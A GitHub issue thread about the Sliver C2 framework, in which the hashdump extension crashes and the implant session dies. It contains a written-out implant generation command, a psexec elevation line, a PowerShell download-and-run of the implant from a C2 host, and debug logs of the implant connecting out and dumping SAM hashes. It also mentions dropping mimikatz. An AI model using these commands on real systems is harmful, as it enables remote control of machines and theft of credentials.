hashdump disconnect session
#1647
Labels
Comments
|
Does this also happen in debug mode? If so, can you share the output of implant? |
|
Session implant generated with: generate --mtls 192.168.45.199:443 -Z r -e -f exe -o windows -a amd64 -s /tmp/test.exe -dConnecting through RDP to the machine in order to see the debug output. Launching an elevated terminal with: .\psexec.exe -accepteula -S -I -D powershell.exeThen, downloading the irm 192.168.45.199/test.exe -o test.exeExecuting-it, doing the PS C:\Windows\system32> .\test.exe
2024/05/01 02:20:52 sliver.go:97: Hello my name is ANXIOUS_PRIZE
2024/05/01 02:20:52 limits.go:58: Limit checks completed
2024/05/01 02:20:52 sliver.go:115: Running in session mode
2024/05/01 02:20:52 session.go:69: Starting interactive session connection loop ...
2024/05/01 02:20:52 transports.go:41: Starting c2 url generator (r) ...
2024/05/01 02:20:52 transports.go:104: Return generator: (chan *url.URL)(0xc0000607e0)
2024/05/01 02:20:52 transports.go:92: Yield c2 uri = 'mtls://192.168.45.199:443'
2024/05/01 02:20:52 transports.go:92: Yield c2 uri = 'mtls://192.168.45.199:443'
2024/05/01 02:20:52 session.go:86: Next CC = mtls://192.168.45.199:443
2024/05/01 02:20:52 session.go:86: Next CC = mtls://192.168.45.199:443
2024/05/01 02:20:52 transports.go:92: Yield c2 uri = 'mtls://192.168.45.199:443'
2024/05/01 02:20:52 session.go:176: Connecting -> 192.168.45.199:443
2024/05/01 02:20:52 sliver.go:296: Host Uuid: e19c1e42-ee8e-69c1-b6eb-402f7bee1d5d
2024/05/01 02:20:52 tun-handlers.go:45: [tunnel] Tunnel handlers map[20:0x7d0380 22:0x7cdda0 23:0x7ccf80 80:0x7ce940 82:0x7d1f80]
2024/05/01 02:21:25 sliver.go:206: [recv] sysHandler 100
2024/05/01 02:21:49 sliver.go:206: [recv] sysHandler 92
2024/05/01 02:21:49 sliver.go:206: [recv] sysHandler 90
2024/05/01 02:21:49 sliver.go:206: [recv] sysHandler 91
2024/05/01 02:21:49 extension_windows.go:113: Calling Hashdump, arguments addr: 0x00000000, args size: 00000000
panic: runtime error: index out of range [0] with length 0
goroutine 17 [running, locked to thread]:
github.com/lesnuages/gosecretsdump/pkg/samreader.SamReader.Dump({0x0, {0x1c00000a1b0, 0x10, 0x10}, 0x1, {0x0, 0x0}, {0x0, 0x0}, {0x0, ...}, ...})
/home/runner/go/pkg/mod/github.com/lesnuages/gosecretsdump@v0.0.0-20230809175616-09e41f9c5008/pkg/samreader/samreader.go:314 +0x5b0
github.com/sliverarmory/secretsdump/pkg/hashdump.Hashdump()
/home/runner/work/hashdump/hashdump/pkg/hashdump/hashdump.go:27 +0x1d8
main.Hashdump(0x1c000052000?, 0x0?, 0x393bb0001?)
/home/runner/work/hashdump/hashdump/dll/main.go:28 +0x18I do not know why it failed to dump the hashes here, but maybe could you at least add a try catch for index out of range to avoid the implant to go away? |
|
Looks like an easy fix. |
|
Closing since it's not a bug in Sliver. Follow up here. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Using:
[*] Client v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df - linux/amd64 Compiled at 2024-02-28 20:46:53 +0100 CET Compiled with go version go1.20.7 linux/amd64I have the following issue:
After that, the
sliverclient is hanging until timeout and the session is totally dead. Any idea about the root cause?I can drop
mimikatzon the target machine and dump the SAM by myself without any problem.The text was updated successfully, but these errors were encountered: